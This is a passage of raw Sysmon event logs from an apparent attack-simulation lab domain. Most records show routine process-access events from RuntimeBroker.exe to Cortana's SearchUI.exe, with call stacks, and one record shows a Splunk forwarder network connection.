10341000x80000000000000001053812Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053811Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.843{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053810Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.774{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+6e886|C:\Windows\System32\windows.storage.dll+701e8|C:\Windows\system32\windows.cortana.Desktop.dll+f6ca|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c 10341000x80000000000000001053809Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.774{466BC892-32D3-60E8-6F0B-00000000CF01}70762764C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\System32\windows.storage.dll+9f28d|C:\Windows\System32\windows.storage.dll+a1970|C:\Windows\System32\windows.storage.dll+d3034|C:\Windows\System32\windows.storage.dll+d072b|C:\Windows\system32\windows.cortana.Desktop.dll+f61e|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+3d38b|C:\Windows\System32\combase.dll+3e7b2|C:\Windows\System32\combase.dll+63ae3|C:\Windows\System32\combase.dll+3e8cd|C:\Windows\System32\combase.dll+61e6f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4 354300x8000000000000000810016Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:05:35.301{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57435-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 10341000x80000000000000001053808Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+16557|C:\Windows\system32\windows.cortana.Desktop.dll+12d9b|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053807Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+12d31|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053806Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053805Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053804Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15084|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053803Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11b6c|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053802Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.703{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+17f26|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a752|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a87f|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+a26c|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053801Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053800Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053799Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70767684C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053798Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49cde 10341000x80000000000000001053797Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053796Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.672{466BC892-32D3-60E8-6F0B-00000000CF01}70764744C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+aeb5a|C:\Windows\System32\combase.dll+a592d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\combase.dll+65213|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+6155d|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+7c419|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d 10341000x80000000000000001053795Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169ae|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1528d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x80000000000000001053794Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:05:37.536{466BC892-32D3-60E8-6F0B-00000000CF01}70768900C:\Windows\System32\RuntimeBroker.exe{466BC892-81EC-60E9-8133-00000000CF01}9348C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\System32\combase.dll+620bb|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+15171|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11c9a|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27cf|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+6520c|C:\Windows\System32\combase.dll+64ec2|C:\Windows\System32\combase.dll+63798|C:\Windows\System32\combase.dll+61c3f|C:\Windows\System32\combase.dll+60c3f|C:\Windows\System32\combase.dll+5e336|C:\Windows\System32\combase.dll+5daea|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+c751|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b2d9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+b009|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053793Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 